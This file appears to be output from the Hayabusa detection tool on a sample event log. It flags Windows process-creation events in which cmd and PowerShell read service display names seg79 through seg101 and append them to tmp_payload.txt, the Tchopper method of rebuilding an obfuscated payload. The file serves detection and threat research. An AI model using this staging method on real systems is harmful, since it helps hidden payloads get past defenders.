2021-11-03 17:36:21.707 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:21.722 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:23.164 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files 
or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:24.619 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:26.075 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.559 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x324 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:27.575 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg83"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: 
FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:29.014 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg84"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:30.465 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg85"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.906 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:31.922 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg86"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:33.398 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg87"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:34.891 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg88"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:36.365 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg89"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.818 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:37.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg90"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe44 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files 
or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
